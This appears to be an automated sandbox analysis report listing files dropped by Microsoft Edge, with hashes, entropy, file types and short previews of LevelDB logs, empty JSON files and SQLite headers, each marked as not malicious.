                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:11.594 1a88 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/03-20:02:11.595 1a88 Recovering log #3.2024/12/03-20:02:11.595 1a88 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):356
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.105331283718764
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXbTN+q2PN723oH+Tcwt7Uh2ghZIFUt8vXbQFBZmw+vXbQFVVkwON723oH+Tcwts:0b8vVaYebIhHh2FUt8PbQFB/+PbQFb5g
                                                                                                                                                                                                                                                                                                    MD5:43633420EEC92FB910D8337D23E3C9F8
                                                                                                                                                                                                                                                                                                    SHA1:8DCBA5EEFF45D4B7D34319B35AE5813F4810D7E5
                                                                                                                                                                                                                                                                                                    SHA-256:6D1C7CD55517432C0B9F87F38F5FC7F453A3EE20FF45DE091F1D3B4B7522FBC5
                                                                                                                                                                                                                                                                                                    SHA-512:0D4C4455F625C276A3B916F8F8740B7CCB8596C70F5938B5574F450F6AF1CF544603084F01EC96E7A71BEE26467C3C153C81F98D7115DB3C411934DAEAB2190B
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:11.594 1a88 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/03-20:02:11.595 1a88 Recovering log #3.2024/12/03-20:02:11.595 1a88 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                    MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                    SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                    SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                    SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                    MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                    SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                    SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                    SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):435
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.16751858511798
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:0OHIvVaYebvqBQFUt8Pu/+P/z5OaYebvqBvJ:P6VaYebvZg8NOaYebvk
                                                                                                                                                                                                                                                                                                    MD5:4905FA1EB443C130F6734EEAE0850B3D
                                                                                                                                                                                                                                                                                                    SHA1:BBA04691417B961CF352DD5939672D7F09F0EDAB
                                                                                                                                                                                                                                                                                                    SHA-256:A0EEDEFDC7C30127701644CF02F4BEA273759CC3B8E522D98CE4539B7DD34BF4
                                                                                                                                                                                                                                                                                                    SHA-512:1DCF45A24B146B6575FE7494A6110570A594C32E735D6F42306C0D0733B53D37465EF37F66EE517D6B5DB5CF0D7CD6A903DC87EA5F2D736D8BC37144E5F05C6D
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:12.442 3c8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/03-20:02:12.444 3c8 Recovering log #3.2024/12/03-20:02:12.450 3c8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):435
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.16751858511798
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:0OHIvVaYebvqBQFUt8Pu/+P/z5OaYebvqBvJ:P6VaYebvZg8NOaYebvk
                                                                                                                                                                                                                                                                                                    MD5:4905FA1EB443C130F6734EEAE0850B3D
                                                                                                                                                                                                                                                                                                    SHA1:BBA04691417B961CF352DD5939672D7F09F0EDAB
                                                                                                                                                                                                                                                                                                    SHA-256:A0EEDEFDC7C30127701644CF02F4BEA273759CC3B8E522D98CE4539B7DD34BF4
                                                                                                                                                                                                                                                                                                    SHA-512:1DCF45A24B146B6575FE7494A6110570A594C32E735D6F42306C0D0733B53D37465EF37F66EE517D6B5DB5CF0D7CD6A903DC87EA5F2D736D8BC37144E5F05C6D
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:12.442 3c8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/03-20:02:12.444 3c8 Recovering log #3.2024/12/03-20:02:12.450 3c8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                    MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                    SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                    SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                    SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):80
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                    MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                    SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                    SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                    SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):426
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.166387977480723
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:0f+vVaYebvqBZFUt8P+/+P1SV5OaYebvqBaJ:BVaYebvyg8l0OaYebvL
                                                                                                                                                                                                                                                                                                    MD5:15D8281097A29E0BB1B6241C288080EB
                                                                                                                                                                                                                                                                                                    SHA1:3CAA471A186CBEF9F9E5036999A47A9B22E45D64
                                                                                                                                                                                                                                                                                                    SHA-256:FBA869C28BFEFFD3CD9A11D5CDBAF0EE2F2A173D6D4DE0C70D104F49EB82B4D0
                                                                                                                                                                                                                                                                                                    SHA-512:1B698D81AC2B0D86194FB754437CB7F665ADD55029C2087B6FE9CF86908B7FD8E6B6B2B22C85BE29003E54EA9D6DB9406EFC6F4A0C3C9165F3CE4D0C9C52904E
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:31.971 1a2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/03-20:02:31.972 1a2c Recovering log #3.2024/12/03-20:02:31.974 1a2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):426
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.166387977480723
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:0f+vVaYebvqBZFUt8P+/+P1SV5OaYebvqBaJ:BVaYebvyg8l0OaYebvL
                                                                                                                                                                                                                                                                                                    MD5:15D8281097A29E0BB1B6241C288080EB
                                                                                                                                                                                                                                                                                                    SHA1:3CAA471A186CBEF9F9E5036999A47A9B22E45D64
                                                                                                                                                                                                                                                                                                    SHA-256:FBA869C28BFEFFD3CD9A11D5CDBAF0EE2F2A173D6D4DE0C70D104F49EB82B4D0
                                                                                                                                                                                                                                                                                                    SHA-512:1B698D81AC2B0D86194FB754437CB7F665ADD55029C2087B6FE9CF86908B7FD8E6B6B2B22C85BE29003E54EA9D6DB9406EFC6F4A0C3C9165F3CE4D0C9C52904E
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:31.971 1a2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/03-20:02:31.972 1a2c Recovering log #3.2024/12/03-20:02:31.974 1a2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):332
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.13851402539146
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXb9Kq2PN723oH+TcwtpIFUt8vXb9DZmw+vXbcFXkwON723oH+Tcwta/WLJ:0b9KvVaYebmFUt8Pb9D/+PbcFX5OaYev
                                                                                                                                                                                                                                                                                                    MD5:1E33EE54C9B08B9AEA7586C75B2C2826
                                                                                                                                                                                                                                                                                                    SHA1:5C07E3E32FEE1E33A53D5C3F1FE35C1F77C480DC
                                                                                                                                                                                                                                                                                                    SHA-256:510FDDD652792A1EAB5CD5325EB4FCD56052F85481E2AA68AF4235A2A99A428E
                                                                                                                                                                                                                                                                                                    SHA-512:5401E217A742F52243009BF39694B06A403A664C199B78F3B61C2A71F516555C59F02A17C9A82521930E55971C93A1A46B9CDF0DB15E2D20B3B53BA3FB69C53A
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:11.598 1ad0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/03-20:02:11.598 1ad0 Recovering log #3.2024/12/03-20:02:11.599 1ad0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):332
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.13851402539146
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXb9Kq2PN723oH+TcwtpIFUt8vXb9DZmw+vXbcFXkwON723oH+Tcwta/WLJ:0b9KvVaYebmFUt8Pb9D/+PbcFX5OaYev
                                                                                                                                                                                                                                                                                                    MD5:1E33EE54C9B08B9AEA7586C75B2C2826
                                                                                                                                                                                                                                                                                                    SHA1:5C07E3E32FEE1E33A53D5C3F1FE35C1F77C480DC
                                                                                                                                                                                                                                                                                                    SHA-256:510FDDD652792A1EAB5CD5325EB4FCD56052F85481E2AA68AF4235A2A99A428E
                                                                                                                                                                                                                                                                                                    SHA-512:5401E217A742F52243009BF39694B06A403A664C199B78F3B61C2A71F516555C59F02A17C9A82521930E55971C93A1A46B9CDF0DB15E2D20B3B53BA3FB69C53A
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:11.598 1ad0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/03-20:02:11.598 1ad0 Recovering log #3.2024/12/03-20:02:11.599 1ad0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.2678265992967903
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:384:L/2qOB1nxCkMmSA1LyKOMq+8iP5GDHP/0jMVump:Kq+n0Jm91LyKOMq+8iP5GLP/0s
                                                                                                                                                                                                                                                                                                    MD5:2000A03D82D7CCF84ECA7EC4BE27DD26
                                                                                                                                                                                                                                                                                                    SHA1:45DF8FB549B4EDCDD2DB0E8EC670B298CFD8780F
                                                                                                                                                                                                                                                                                                    SHA-256:F50D12B32E900AC4FBC8BAA7E652DA0196B879113E2A511B38E5607B4E11537C
                                                                                                                                                                                                                                                                                                    SHA-512:674CC677BA89390D24E609656447A293D76CA5C212EAA1F04774E16DC915C2C815299CA4FF2012026BFC7FD6ACED4ABC2A957CB2E07D574CA888F783DB28EA06
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.4659821110973769
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcBB1WG:v7doKsKuKZKlZNmu46yjxHr
                                                                                                                                                                                                                                                                                                    MD5:9E793FC948C900D92EA0BB7BFF4C4601
                                                                                                                                                                                                                                                                                                    SHA1:232483D4D939C37B3941EC8EC8AEE0F5A2E26816
                                                                                                                                                                                                                                                                                                    SHA-256:B34443F6BA9EB721751CADEEFE258E4917E84814FA9D33A5CD9299FC2E1E9C29
                                                                                                                                                                                                                                                                                                    SHA-512:503F99ADAFC664F4D7D0622A5D14A0ED201120DEFACA57A6D77DAD01E9681F37DF2E76D221B8692730AEE5FB7F60DD2CC665AFE7CFE4138294A93539D2CA6721
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):12824
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.13496676303918823
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:l/l9llNllv/etXlRbuebl+ll1qvTv4RRfs21d7jdtQfQPx4WneblOWXtXlRbuej:lnSl1ulrpRS+dndNPGl1uK
                                                                                                                                                                                                                                                                                                    MD5:60B4A9EF2630E5966A1F599C3D5EF947
                                                                                                                                                                                                                                                                                                    SHA1:92EC200AEDAEDE5196BEDC03787E37B191286B41
                                                                                                                                                                                                                                                                                                    SHA-256:C47CD52FEF40E71EA02EB9159E41AB164F574540614AFA74F4DFEC66A68AFB6B
                                                                                                                                                                                                                                                                                                    SHA-512:2DF1A17B0178B4D9A2A3B5498CB384EFC2559E7D8A16F5A238DCE0F3F19A0705D0143B6A5383F990ACCBEABD64B80709080543EA44F8122BD7F22ADBB285E7FE
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:............_.cQ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
